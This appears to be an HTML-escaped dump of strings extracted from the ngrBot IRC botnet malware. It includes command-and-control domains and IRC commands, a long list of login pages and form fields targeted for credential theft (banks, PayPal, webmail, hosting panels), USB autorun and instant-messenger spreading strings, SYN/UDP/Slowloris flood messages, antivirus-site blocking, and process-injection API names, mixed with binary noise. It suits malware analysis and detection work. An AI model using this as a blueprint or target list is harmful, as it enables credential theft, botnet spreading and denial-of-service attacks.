/&gt;NtQuerySystemInformation&lt;br /&gt;LdrEnumerateLoadedModules&lt;br /&gt;NtQueryInformationProcess&lt;br /&gt;LdrGetProcedureAddress&lt;br /&gt;NtQueryVirtualMemory&lt;br /&gt;LdrLoadDll&lt;br /&gt;NtQueryInformationThread&lt;br /&gt;LdrGetDllHandle&lt;br /&gt;RtlAnsiStringToUnicodeString&lt;br /&gt;\\.\pipe\%s&lt;br /&gt;kernel32.dll&lt;br /&gt;GetNativeSystemInfo&lt;br /&gt;%s_%d&lt;br /&gt;%s_0&lt;br /&gt;%s-Mutex&lt;br /&gt;SeDebugPrivilege&lt;br /&gt;ntdll.dll&lt;br /&gt;NtGetNextProcess&lt;br /&gt;%s-pid&lt;br /&gt;%s-comm&lt;br /&gt;NtResumeThread&lt;br /&gt;PONG &lt;br /&gt;JOIN #&lt;br /&gt;PRIVMSG #&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot;&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot; - &amp;quot;%s&amp;quot; will be removed at reboot!&lt;br /&gt;.exe&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d.&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d (Target: %s).&lt;br /&gt;PRIVMSG %255s&lt;br /&gt;JOIN %255s&lt;br /&gt;PRIVMSG&lt;br /&gt;JOIN&lt;br /&gt;%s:%d&lt;br /&gt;NtSetInformationProcess&lt;br /&gt;%s.%s%s&lt;br /&gt;%S%s%s&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;%s.%S%S&lt;br /&gt;%S%S%S&lt;br /&gt;state_%s&lt;br /&gt;%s.%s (p='%S')&lt;br /&gt;pop3://%s:%s@%s:%d&lt;br /&gt;popgrab&lt;br /&gt;%s:%s@%s:%d&lt;br /&gt;anonymous&lt;br /&gt;ftp://%s:%s@%s:%d&lt;br /&gt;ftpgrab&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s (%s : %s)&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s : %s&lt;br /&gt;Directadmin&lt;br /&gt;WHCMS&lt;br /&gt;cPanel&lt;br /&gt;blog&lt;br /&gt;%s-%s-%s&lt;br /&gt;ffgrab&lt;br /&gt;iegrab&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%s'&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%S'&lt;br /&gt;webroot.&lt;br /&gt;fortinet.&lt;br /&gt;virusbuster.nprotect.&lt;br /&gt;gdatasoftware.&lt;br /&gt;virus.&lt;br /&gt;precisesecurity.&lt;br /&gt;lavasoft.&lt;br /&gt;heck.tc&lt;br /&gt;emsisoft.&lt;br /&gt;onlinemalwarescanner.&lt;br /&gt;onecare.live.&lt;br /&gt;f-secure.&lt;br /&gt;bullguard.&lt;br /&gt;clamav.&lt;br /&gt;pandasecurity.&lt;br /&gt;sophos.&lt;br /&gt;malwarebytes.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;norton.&lt;br /&gt;norman.&lt;br /&gt;mcafee.&lt;br /&gt;symantec&lt;br /&gt;comodo.&lt;br /&gt;avast.&lt;br /&gt;avira.&lt;br /&gt;avg.&lt;br /&gt;bitdefender.&lt;br /&gt;eset.&lt;br /&gt;kaspersky.&lt;br /&gt;trendmicro.&lt;br /&gt;iseclab.&lt;br /&gt;virscan.&lt;br /&gt;garyshood.&lt;br /&gt;viruschief.&lt;br /&gt;jotti.&lt;br /&gt;threatexpert.&lt;br /&gt;novirusthanks.&lt;br /&gt;virustotal.&lt;br /&gt;login[password]&lt;br /&gt;login[username]&lt;br /&gt;*members*.iknowthatgirl*/members*&lt;br /&gt;IKnowThatGirl&lt;br /&gt;*youporn.*/login*&lt;br /&gt;YouPorn&lt;br /&gt;*members.brazzers.com*&lt;br /&gt;Brazzers&lt;br /&gt;clave&lt;br /&gt;numeroTarjeta&lt;br /&gt;*clave=*&lt;br /&gt;*bcointernacional*login*&lt;br /&gt;Bcointernacional&lt;br /&gt;*:2222/CMD_LOGIN*&lt;br /&gt;*whcms*dologin*&lt;br /&gt;*:2086/login*&lt;br /&gt;*:2083/login*&lt;br /&gt;*:2082/login*&lt;br /&gt;*webnames.ru/*user_login*&lt;br /&gt;Webnames&lt;br /&gt;*dotster.com/*login*&lt;br /&gt;Dotster&lt;br /&gt;loginid&lt;br /&gt;*enom.com/login*&lt;br /&gt;Enom&lt;br /&gt;login.Pass&lt;br /&gt;login.User&lt;br /&gt;*login.Pass=*&lt;br /&gt;*1and1.com/xml/config*&lt;br /&gt;1and1&lt;br /&gt;token&lt;br /&gt;*moniker.com/*Login*&lt;br /&gt;Moniker&lt;br /&gt;LoginPassword&lt;br /&gt;LoginUserName&lt;br /&gt;*LoginPassword=*&lt;br /&gt;*namecheap.com/*login*&lt;br /&gt;Namecheap&lt;br /&gt;loginname&lt;br /&gt;*godaddy.com/login*&lt;br /&gt;Godaddy&lt;br /&gt;Password&lt;br /&gt;EmailName&lt;br /&gt;*Password=*&lt;br /&gt;*alertpay.com/login*&lt;br /&gt;Alertpay&lt;br /&gt;*netflix.com/*ogin*&lt;br /&gt;Netflix&lt;br /&gt;*thepiratebay.org/login*&lt;br /&gt;Thepiratebay&lt;br /&gt;*torrentleech.org/*login*&lt;br /&gt;Torrentleech&lt;br /&gt;*vip-file.com/*/signin-do*&lt;br /&gt;Vip-file&lt;br /&gt;*pas=*&lt;br /&gt;*sms4file.com/*/signin-do*&lt;br /&gt;Sms4file&lt;br /&gt;*letitbit.net*&lt;br /&gt;Letitbit&lt;br /&gt;*what.cd/login*&lt;br /&gt;Whatcd&lt;br /&gt;*oron.com/login*&lt;br /&gt;Oron&lt;br /&gt;*filesonic.com/*login*&lt;br /&gt;Filesonic&lt;br /&gt;*speedyshare.com/login*&lt;br /&gt;Speedyshare&lt;br /&gt;*pw=*&lt;br /&gt;*uploaded.to/*login*&lt;br /&gt;Uploaded&lt;br /&gt;*uploading.com/*login*&lt;br /&gt;Uploading&lt;br /&gt;loginUserPassword&lt;br /&gt;loginUserName&lt;br /&gt;*loginUserPassword=*&lt;br /&gt;*fileserv.com/login*&lt;br /&gt;Fileserve&lt;br /&gt;*hotfile.com/login*&lt;br /&gt;Hotfile&lt;br /&gt;*4shared.com/login*&lt;br /&gt;4shared&lt;br /&gt;txtpass&lt;br /&gt;txtuser&lt;br /&gt;*txtpass=*&lt;br /&gt;*netload.in/index*&lt;br /&gt;Netload&lt;br /&gt;*freakshare.com/login*&lt;br /&gt;Freakshare&lt;br /&gt;login_pass&lt;br /&gt;*login_pass=*&lt;br /&gt;*mediafire.com/*login*&lt;br /&gt;Mediafire&lt;br /&gt;*sendspace.com/login*&lt;br /&gt;Sendspace&lt;br /&gt;*megaupload.*/*login*&lt;br /&gt;Megaupload&lt;br /&gt;*depositfiles.*/*/login*&lt;br /&gt;Depositfiles&lt;br /&gt;userid&lt;br /&gt;*signin.ebay*SignIn&lt;br /&gt;eBay&lt;br /&gt;*officebanking.cl/*login.asp*&lt;br /&gt;OfficeBanking&lt;br /&gt;*secure.logmein.*/*logincheck*&lt;br /&gt;LogMeIn&lt;br /&gt;session[password]&lt;br /&gt;session[username_or_email]&lt;br /&gt;*password]=*&lt;br /&gt;*twitter.com/sessions&lt;br /&gt;Twitter&lt;br /&gt;txtPassword&lt;br /&gt;txtEmail&lt;br /&gt;*&amp;amp;txtPassword=*&lt;br /&gt;*.moneybookers.*/*login.pl&lt;br /&gt;Moneybookers&lt;br /&gt;*runescape*/*weblogin*&lt;br /&gt;Runescape&lt;br /&gt;*dyndns*/account*&lt;br /&gt;DynDNS&lt;br /&gt;*&amp;amp;password=*&lt;br /&gt;*no-ip*/login*&lt;br /&gt;NoIP&lt;br /&gt;*steampowered*/login*&lt;br /&gt;Steam&lt;br /&gt;quick_password&lt;br /&gt;quick_username&lt;br /&gt;username&lt;br /&gt;*hackforums.*/member.php&lt;br /&gt;Hackforums&lt;br /&gt;email&lt;br /&gt;*facebook.*/login.php*&lt;br /&gt;Facebook&lt;br /&gt;*login.yahoo.*/*login*&lt;br /&gt;Yahoo&lt;br /&gt;passwd&lt;br /&gt;login&lt;br /&gt;*passwd=*&lt;br /&gt;*login.live.*/*post.srf*&lt;br /&gt;Live&lt;br /&gt;TextfieldPassword&lt;br /&gt;TextfieldEmail&lt;br /&gt;*TextfieldPassword=*&lt;br /&gt;*gmx.*/*FormLogin*&lt;br /&gt;*Passwd=*&lt;br /&gt;Gmail&lt;br /&gt;FLN-Password&lt;br /&gt;FLN-UserName&lt;br /&gt;*FLN-Password=*&lt;br /&gt;*fastmail.*/mail/*&lt;br /&gt;Fastmail&lt;br /&gt;pass&lt;br /&gt;user&lt;br /&gt;*pass=*&lt;br /&gt;*bigstring.*/*index.php*&lt;br /&gt;BigString&lt;br /&gt;screenname&lt;br /&gt;*screenname.aol.*/login.psp*&lt;br /&gt;password&lt;br /&gt;loginId&lt;br /&gt;*password=*&lt;br /&gt;*aol.*/*login.psp*&lt;br /&gt;Passwd&lt;br /&gt;Email&lt;br /&gt;*service=youtube*&lt;br /&gt;*google.*/*ServiceLoginAuth*&lt;br /&gt;YouTube&lt;br /&gt;login_password&lt;br /&gt;login_email&lt;br /&gt;*login_password=*&lt;br /&gt;*paypal.*/webscr?cmd=_login-submit*&lt;br /&gt;PayPal&lt;br /&gt;%s / ?%d HTTP/1.1&lt;br /&gt;Host: %s&lt;br /&gt;User-Agent: %s&lt;br /&gt;Keep-Alive: 300&lt;br /&gt;Connection: keep-alive&lt;br /&gt;Content-Length: 42&lt;br /&gt;POST&lt;br /&gt;Mozilla/4.0&lt;br /&gt;Connection: Close&lt;br /&gt;X-a: b&lt;br /&gt;\\.\PHYSICALDRIVE0&lt;br /&gt;00100&lt;br /&gt;SeShutdownPrivilege&lt;br /&gt;NtShutdownSystem&lt;br /&gt;This binary is invalid.&lt;br /&gt;Main reasons:&lt;br /&gt;- you stupid cracker&lt;br /&gt;- you stupid cracker...&lt;br /&gt;- you stupid cracker?!&lt;br /&gt;ngrBot Error&lt;br /&gt;shell32.dll&lt;br /&gt;http&lt;br /&gt;httpi&lt;br /&gt;usbi&lt;br /&gt;dnsapi.dll&lt;br /&gt;DnsFlushResolverCache&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;HTTP&lt;br /&gt;Host: &lt;br /&gt;POST /%1023s&lt;br /&gt;{%s&amp;#124;%s%s}%s&lt;br /&gt;n%s{%s&amp;#124;%s%s}%s&lt;br /&gt;&amp;lt;br&amp;gt;&lt;br /&gt;admin&lt;br /&gt;isadmin&lt;br /&gt;%s&amp;#124;%s&amp;#124;%s&lt;br /&gt;[DNS]: Redirecting &amp;quot;%s&amp;quot; to &amp;quot;%s&amp;quot;&lt;br /&gt;disabled&lt;br /&gt;enabled&lt;br /&gt;%s&amp;#124;%s&lt;br /&gt;[Logins]: Cleared %d logins&lt;br /&gt;#user&lt;br /&gt;#admin&lt;br /&gt;#new&lt;br /&gt;removing&lt;br /&gt;exiting&lt;br /&gt;reconnecting&lt;br /&gt;MOTD&lt;br /&gt;bsod&lt;br /&gt;disable&lt;br /&gt;POP3 -&amp;gt; &lt;br /&gt;FTP -&amp;gt; &lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Download error: MD5 mismatch (%s != %s)&lt;br /&gt;dlds&lt;br /&gt;http://&lt;br /&gt;rebooting&lt;br /&gt;[Login]: %s&lt;br /&gt;[DNS]: Blocked %d domain(s) - Redirected %d domain(s)&lt;br /&gt;[Speed]: Estimated upload speed %d KB/s&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;ngrBot&lt;br /&gt;running&lt;br /&gt;IPC_Check&lt;br /&gt;shell\open\command=&lt;br /&gt;shell\explore\command=&lt;br /&gt;icon=shell32.dll,7&lt;br /&gt;useautoplay=1&lt;br /&gt;action=Open folder to view files&lt;br /&gt;shellexecute=&lt;br /&gt;[autorun]&lt;br /&gt;.lnk&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;/c &amp;quot;start %%cd%%RECYCLER\%s&lt;br /&gt;RECYCLER&lt;br /&gt;.inf&lt;br /&gt;%s%s&lt;br /&gt;\\.\%c:&lt;br /&gt;%s\%s&lt;br /&gt;%sautorun.tmp&lt;br /&gt;%sautorun.inf&lt;br /&gt;%c:\&lt;br /&gt;gdkWindowToplevelClass&lt;br /&gt;%0x.exe&lt;br /&gt;comment-text&lt;br /&gt;*bebo.*/c/home/ajax_post_lifestream_comment&lt;br /&gt;bebo Lifestream&lt;br /&gt;*bebo.*/c/profile/comment_post.json&lt;br /&gt;bebo Comment&lt;br /&gt;Message&lt;br /&gt;*bebo.*/mail/MailCompose.jsp*&lt;br /&gt;bebo Message&lt;br /&gt;*friendster.*/sendmessage.php*&lt;br /&gt;Friendster Message&lt;br /&gt;comment&lt;br /&gt;Friendster Comment&lt;br /&gt;shoutout&lt;br /&gt;*friendster.*/rpc.php&lt;br /&gt;Friendster Shoutout&lt;br /&gt;*vkontakte.ru/mail.php&lt;br /&gt;vkontakte Message&lt;br /&gt;*vkontakte.ru/wall.php&lt;br /&gt;vkontakte Wall&lt;br /&gt;message&lt;br /&gt;*vkontakte.ru/api.php&lt;br /&gt;vkontakte Chat&lt;br /&gt;text&lt;br /&gt;*twitter.*/*direct_messages/new*&lt;br /&gt;Twitter Message&lt;br /&gt;*twitter.*/*status*/update*&lt;br /&gt;Twitter Tweet&lt;br /&gt;status&lt;br /&gt;*facebook.*/ajax/*MessageComposerEndpoint.php*&lt;br /&gt;Facebook Message&lt;br /&gt;msg_text&lt;br /&gt;*facebook.*/ajax/chat/send.php*&lt;br /&gt;Facebook IM&lt;br /&gt;-_.!~*'()&lt;br /&gt;Content-Length: &lt;br /&gt;%s.%s hijacked!&lt;br /&gt;MSG %d %s %d&lt;br /&gt;MSG %d %1s&lt;br /&gt;SDG %d %d&lt;br /&gt;Reliability: &lt;br /&gt;From: &lt;br /&gt;Content-Length: %d&lt;br /&gt;X-MMS-IM-Format: &lt;br /&gt;SDG %d&lt;br /&gt;bmsn&lt;br /&gt;%s_0x%08X&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegCreateKeyExA&lt;br /&gt;URLDownloadToFileW&lt;br /&gt;URLDownloadToFileA&lt;br /&gt;PR_Write&lt;br /&gt;DnsQuery_W&lt;br /&gt;DnsQuery_A&lt;br /&gt;InternetWriteFile&lt;br /&gt;HttpSendRequestW&lt;br /&gt;HttpSendRequestA&lt;br /&gt;GetAddrInfoW&lt;br /&gt;send&lt;br /&gt;CreateFileA&lt;br /&gt;MoveFileW&lt;br /&gt;MoveFileA&lt;br /&gt;DeleteFileW&lt;br /&gt;DeleteFileA&lt;br /&gt;CopyFileW&lt;br /&gt;CopyFileA&lt;br /&gt;NtQueryDirectoryFile&lt;br /&gt;NtEnumerateValueKey&lt;br /&gt;%08x&lt;br /&gt;OPEN&lt;br /&gt;DnsFree&lt;br /&gt;DnsQuery_A&lt;br /&gt;DNSAPI.dll&lt;br /&gt;FreeContextBuffer&lt;br /&gt;InitializeSecurityContextW&lt;br /&gt;FreeCredentialsHandle&lt;br /&gt;DeleteSecurityContext&lt;br /&gt;QueryContextAttributesW&lt;br /&gt;AcquireCredentialsHandleW&lt;br /&gt;EncryptMessage&lt;br /&gt;DecryptMessage&lt;br /&gt;InitializeSecurityContextA&lt;br /&gt;ApplyControlToken&lt;br /&gt;Secur32.dll&lt;br /&gt;SHGetSpecialFolderPathW&lt;br /&gt;SHGetFileInfoA&lt;br /&gt;ShellExecuteA&lt;br /&gt;SHELL32.dll&lt;br /&gt;InternetCloseHandle&lt;br /&gt;InternetReadFile&lt;br /&gt;InternetQueryDataAvailable&lt;br /&gt;HttpQueryInfoA&lt;br /&gt;InternetOpenUrlA&lt;br /&gt;InternetOpenA&lt;br /&gt;HttpQueryInfoW&lt;br /&gt;InternetQueryOptionW&lt;br /&gt;WININET&lt;br /&gt;.dll&lt;br /&gt;PathAppendW&lt;br /&gt;StrStrIA&lt;br /&gt;PathAppendA&lt;br /&gt;PathFindExtensionA&lt;br /&gt;SHLWAPI.dll&lt;br /&gt;WS2_32.dll&lt;br /&gt;memset&lt;br /&gt;wcsstr&lt;br /&gt;strstr&lt;br /&gt;wcsrchr&lt;br /&gt;??3@YAXPAX@Z&lt;br /&gt;atoi&lt;br /&gt;sscanf&lt;br /&gt;_strcmpi&lt;br /&gt;printf&lt;br /&gt;_snprintf&lt;br /&gt;sprintf&lt;br /&gt;strncpy&lt;br /&gt;_memicmp&lt;br /&gt;_wcsnicmp&lt;br /&gt;_vsnprintf&lt;br /&gt;_stricmp&lt;br /&gt;strtok&lt;br /&gt;strchr&lt;br /&gt;_snwprintf&lt;br /&gt;??2@YAPAXI@Z&lt;br /&gt;_strnicmp&lt;br /&gt;isxdigit&lt;br /&gt;memmove&lt;br /&gt;strncmp&lt;br /&gt;toupper&lt;br /&gt;strrchr&lt;br /&gt;vsprintf&lt;br /&gt;isalnum&lt;br /&gt;strncat&lt;br /&gt;MSVCRT.dll&lt;br /&gt;lstrcpyA&lt;br /&gt;MoveFileExA&lt;br /&gt;lstrcmpA&lt;br /&gt;WideCharToMultiByte&lt;br /&gt;MoveFileExW&lt;br /&gt;lstrcmpW&lt;br /&gt;ExitThread&lt;br /&gt;MultiByteToWideChar&lt;br /&gt;GetFileAttributesA&lt;br /&gt;SetFileAttributesW&lt;br /&gt;GetFileAttributesW&lt;br /&gt;LoadLibraryW&lt;br /&gt;CloseHandle&lt;br /&gt;SetFileTime&lt;br /&gt;CreateFileW&lt;br /&gt;GetFileTime&lt;br /&gt;GetSystemTimeAsFileTime&lt;br /&gt;WriteFile&lt;br /&gt;GetModuleHandleW&lt;br /&gt;GetLastError&lt;br /&gt;ReadFile&lt;br /&gt;GetTickCount&lt;br /&gt;HeapAlloc&lt;br /&gt;GetProcessHeap&lt;br /&gt;HeapFree&lt;br /&gt;lstrlenA&lt;br /&gt;Sleep&lt;br /&gt;WriteProcessMemory&lt;br /&gt;ReadProcessMemory&lt;br /&gt;InitializeCriticalSection&lt;br /&gt;LeaveCriticalSection&lt;br /&gt;EnterCriticalSection&lt;br /&gt;HeapReAlloc&lt;br /&gt;SetEvent&lt;br /&gt;ConnectNamedPipe&lt;br /&gt;CreateNamedPipeA&lt;br /&gt;CreateEventA&lt;br /&gt;DisconnectNamedPipe&lt;br /&gt;GetOverlappedResult&lt;br /&gt;WaitForMultipleObjects&lt;br /&gt;CreateFileA&lt;br /&gt;VirtualFreeEx&lt;br /&gt;VirtualAllocEx&lt;br /&gt;IsWow64Process&lt;br /&gt;CreateRemoteThread&lt;br /&gt;OpenProcess&lt;br /&gt;WaitForSingleObject&lt;br /&gt;ReleaseMutex&lt;br /&gt;MapViewOfFile&lt;br /&gt;OpenFileMappingA&lt;br /&gt;CreateFileMappingA&lt;br /&gt;InterlockedIncrement&lt;br /&gt;UnmapViewOfFile&lt;br /&gt;CreateMutexA&lt;br /&gt;GetVersionExA&lt;br /&gt;GetModuleFileNameW&lt;br /&gt;InterlockedCompareExchange&lt;br /&gt;CreateThread&lt;br /&gt;GetWindowsDirectoryW&lt;br /&gt;DeleteFileW&lt;br /&gt;GetTempFileNameW&lt;br /&gt;lstrcatW&lt;br /&gt;lstrcpynW&lt;br /&gt;DeleteFileA&lt;br /&gt;SetFileAttributesA&lt;br /&gt;lstrcpyW&lt;br /&gt;LocalFree&lt;br /&gt;LocalAlloc&lt;br /&gt;lstrcpynA&lt;br /&gt;SetFilePointer&lt;br /&gt;DeviceIoControl&lt;br /&gt;VirtualAlloc&lt;br /&gt;CreateProcessW&lt;br /&gt;ExitProcess&lt;br /&gt;lstrcatA&lt;br /&gt;GetVolumeInformationW&lt;br /&gt;GetLocaleInfoA&lt;br /&gt;FlushFileBuffers&lt;br /&gt;CopyFileW&lt;br /&gt;FindClose&lt;br /&gt;FindNextFileA&lt;br /&gt;FindFirstFileA&lt;br /&gt;SetCurrentDirectoryA&lt;br /&gt;LockFile&lt;br /&gt;GetFileSize&lt;br /&gt;CreateDirectoryA&lt;br /&gt;GetLogicalDriveStringsA&lt;br /&gt;OpenMutexA&lt;br /&gt;GetModuleFileNameA&lt;br /&gt;GetWindowsDirectoryA&lt;br /&gt;KERNEL32.dll&lt;br /&gt;MessageBoxA&lt;br /&gt;wvsprintfA&lt;br /&gt;wsprintfW&lt;br /&gt;DefWindowProcA&lt;br /&gt;DispatchMessageA&lt;br /&gt;TranslateMessage&lt;br /&gt;GetMessageA&lt;br /&gt;RegisterDeviceNotificationA&lt;br /&gt;CreateWindowExA&lt;br /&gt;RegisterClassExA&lt;br /&gt;USER32.dll&lt;br /&gt;CryptGetHashParam&lt;br /&gt;CryptDestroyHash&lt;br /&gt;CryptHashData&lt;br /&gt;CryptReleaseContext&lt;br /&gt;CryptCreateHash&lt;br /&gt;CryptAcquireContextA&lt;br /&gt;AdjustTokenPrivileges&lt;br /&gt;LookupPrivilegeValueA&lt;br /&gt;OpenProcessToken&lt;br /&gt;RegCloseKey&lt;br /&gt;RegSetValueExW&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegNotifyChangeKeyValue&lt;br /&gt;RegSetValueExA&lt;br /&gt;RegOpenKeyExA&lt;br /&gt;ADVAPI32.dll&lt;br /&gt;CoCreateInstance&lt;br /&gt;CoInitialize&lt;br /&gt;ole32.dll&lt;br /&gt; n;^&lt;br /&gt;Qkkbal&lt;br /&gt;i]Wb&lt;br /&gt;9a&amp;amp;g&lt;br /&gt;MGiI&lt;br /&gt;wn&amp;gt;Jj&lt;br /&gt;#.zf&lt;br /&gt;+o*7&lt;br /&gt;!!!!!!!!&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;@@@@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x&lt;br /&gt;lalorlz1.info&lt;br /&gt;ROCKR&lt;br /&gt;rlz1lola.info&lt;br /&gt;ROCKR&lt;br /&gt;rlz01jm.info&lt;br /&gt;ROCKR&lt;br /&gt;#ROCK&lt;br /&gt;ngrBot&lt;br /&gt;ELPERRO&lt;br /&gt;]1.1.0.0&lt;br /&gt;CUSTOMER&lt;br /&gt;FvLQ49IlzIyLjj6m&lt;br /&gt;msn.set&lt;br /&gt;msn.int&lt;br /&gt;http.set&lt;br /&gt;http.int&lt;br /&gt;http.inj&lt;br /&gt;mdns&lt;br /&gt;stats&lt;br /&gt;speed&lt;br /&gt;logins&lt;br /&gt;slow&lt;br /&gt;ssyn&lt;br /&gt;stop&lt;br /&gt;F4XA&lt;br /&gt;gGWHXA&lt;br /&gt;5hXA&lt;br /&gt;ZpXA&lt;br /&gt;` WA&lt;br /&gt;f0WA&lt;br /&gt;u{A&amp;lt;WA&lt;br /&gt;[@WA&lt;br /&gt;PASS %s&lt;br /&gt;[.ShellClassInfo]&lt;br /&gt;CLSID={645FF040-5081-101B-9F08-00AA002F954E}&lt;br /&gt;USER %s 0 0 :%s&lt;br /&gt;NICK %s&lt;br /&gt;JOIN %s %s&lt;br /&gt;PART %s&lt;br /&gt;PRIVMSG %s :%s&lt;br /&gt;QUIT :%s&lt;br /&gt;PONG %s&lt;br /&gt;PING&lt;br /&gt;PRIVMSG&lt;br /&gt;[v=&amp;quot;%s&amp;quot; c=&amp;quot;%s&amp;quot; h=&amp;quot;%s&amp;quot; p=&amp;quot;%S&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Updated bot file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Executed file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[Slowloris]: Starting flood on &amp;quot;%s&amp;quot; for %d minute(s)&lt;br /&gt;[Slowloris]: Finished flood on &amp;quot;%s&amp;quot;&lt;br /&gt;[UDP]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[UDP]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[SYN]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[SYN]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[USB]: Infected %s&lt;br /&gt;[MSN]: Updated MSN spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: Updated MSN spread inte&lt;br /&gt;rval to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Updated HTTP spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Injected value is now %s.&lt;br /&gt;[HTTP]: Updated HTTP spread interval to &amp;quot;%s&amp;quot;&lt;br /&gt;[Visit]: Visited &amp;quot;%s&amp;quot;&lt;br /&gt;[DNS]: Blocked &amp;quot;%s&amp;quot;&lt;br /&gt;[usb=&amp;quot;%d&amp;quot; msn=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[ftp=&amp;quot;%d&amp;quot; pop=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[RSOCK4]: Started rsock4 on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[RSOCK4]: Stopped rsock4&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Update error: MD5 mismatch (%s != %s)&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error downloading file [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error writing download to &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Error creating process &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] File &amp;quot;%S&amp;quot; has an invalid binary type. [type=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error getting temporary filename. [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d='%s&amp;quot;] Error getting application data path [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[Visit]: Error visitng &amp;quot;%s&amp;quot;&lt;br /&gt;[FTP Login]: %s&lt;br /&gt;[POP3 Login]: %s&lt;br /&gt;[FTP Infect]: %s was iframed&lt;br /&gt;[HTTP Login]: %s&lt;br /&gt;[HTTP Traffic]: %s&lt;br /&gt;[Ruskill]: Detected File: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected DNS: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected Reg: &amp;quot;%s&amp;quot;&lt;br /&gt;[PDef+]: %s&lt;br /&gt;[DNS]: Blocked DNS &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: %s&lt;br /&gt;[HTTP]: %s&lt;br /&gt;ftplog&lt;br /&gt;poplog&lt;br /&gt;ftpinfect&lt;br /&gt;httplogin&lt;br /&gt;httptraff&lt;br /&gt;ruskill&lt;br /&gt;rdns&lt;br /&gt;rreg&lt;br /&gt;httpspread&lt;br /&gt;http://api.wipmania.com/&lt;br /&gt;\\.\pipe\%08x_ipc&lt;br /&gt;0;0G0O0V0d0n0s0&lt;br /&gt;1)13181Y1e1u1&amp;#124;1&lt;br /&gt;2C2c2&lt;br /&gt;3 363M3j3u3&lt;br /&gt;6(6/686J6O6T6m6&lt;br /&gt;7 7(7O7V7_7&lt;br /&gt;7=8T8\8&lt;br /&gt;9#9:9W9^9f9~9&lt;br /&gt;98:R:[:&lt;br /&gt;;U&amp;lt;e&amp;lt;j&amp;lt;p&amp;lt;&lt;br /&gt;&amp;lt;g=o=&lt;br /&gt;&amp;gt;*&amp;gt;N&amp;gt;&lt;br /&gt;?%?/?6?A?P?&lt;br /&gt;0&amp;lt;0E0L0S0c0i0t0{0&lt;br /&gt;2!3-4d4n4s4&lt;br /&gt;5(5:5?5D5a5x5&lt;br /&gt;6 6J6a6&lt;br /&gt;7&amp;amp;7.7&amp;gt;7I7N7f7&lt;br /&gt;1#2_2&lt;br /&gt;8&amp;quot;8Q8X8g8q8&lt;br /&gt;9':;:Y:&lt;br /&gt;&amp;lt;'&amp;lt;1&amp;lt;H&amp;lt;X&amp;lt;x&amp;lt;&lt;br /&gt;=%=7=D=K=Z=w=}=&lt;br /&gt;&amp;gt;@&amp;gt;R&amp;gt;\&amp;gt;m&amp;gt;&lt;br /&gt;?1?&amp;lt;?B?j?&lt;br /&gt;0g0g1&lt;br /&gt;1&amp;quot;2Q2~2&lt;br /&gt;203N3&lt;br /&gt;424&amp;gt;4^4&lt;br /&gt;8;9~9&lt;br /&gt;:K:';A;_;&lt;br 